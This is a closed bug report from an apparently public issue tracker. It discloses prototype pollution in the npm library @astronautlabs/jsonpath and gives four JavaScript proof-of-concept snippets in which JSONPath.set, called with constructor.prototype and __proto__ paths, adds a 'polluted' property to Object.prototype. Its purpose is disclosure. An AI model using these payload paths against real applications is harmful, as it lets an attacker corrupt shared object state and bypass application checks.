Closed
Labels: bug (Something isn't working)
Description

🐛 Bug Report

Have you spent some time to check if this issue has been raised before?
[✅] I have googled for a similar issue or checked our older issues for a similar bug

Have you read the Code of Conduct?
[✅] I have read the Code of Conduct
To Reproduce

Step 1: Install Dependencies

```sh
npm install @astronautlabs/jsonpath
```

Step 2: Vulnerability Reproduction Code (Take TP0001 as an example)

```js
const JSONPath = require('@astronautlabs/jsonpath').JSONPath;

// Initially clean Object.prototype
console.log('Before pollution:', Object.prototype.polluted); // Output: undefined

// Construct prototype pollution payload
const targetObj = {};
JSONPath.set(targetObj, '$.constructor.prototype.polluted', 'pwned');

// Verify prototype pollution
console.log('After pollution:', Object.prototype.polluted); // Output: pwned
```

Step 3: Reproduce Other Variant Scenarios

Scenario 2 (TP0003: `__proto__` path)

```js
const JSONPath = require('@astronautlabs/jsonpath').JSONPath;
const targetObj = {};
JSONPath.set(targetObj, "$['__proto__']['polluted']", 'pwned');
console.log(Object.prototype.polluted); // Output: pwned
```

Scenario 3 (TP0007: constructor.prototype path without root prefix)

```js
const JSONPath = require('@astronautlabs/jsonpath').JSONPath;
JSONPath.set({}, 'constructor.prototype.polluted', true);
console.log(Object.prototype.polluted); // Output: true
```

Scenario 4 (TP0008: Array-form path)

```js
const JSONPath = require('@astronautlabs/jsonpath').JSONPath;
JSONPath.set({}, ['constructor', 'prototype', 'polluted'], true);
console.log(Object.prototype.polluted); // Output: true
```

Expected behavior
Actual Behavior
(Write what happened. Add screenshots, if applicable.)
Your Environment
Library Version: @astronautlabs/jsonpath
Operating System: Ubuntu 22.04
Node.js Version: v16.20.0 / v18.17.1 / v20.9.0
Runtime Environment: Node.js native environment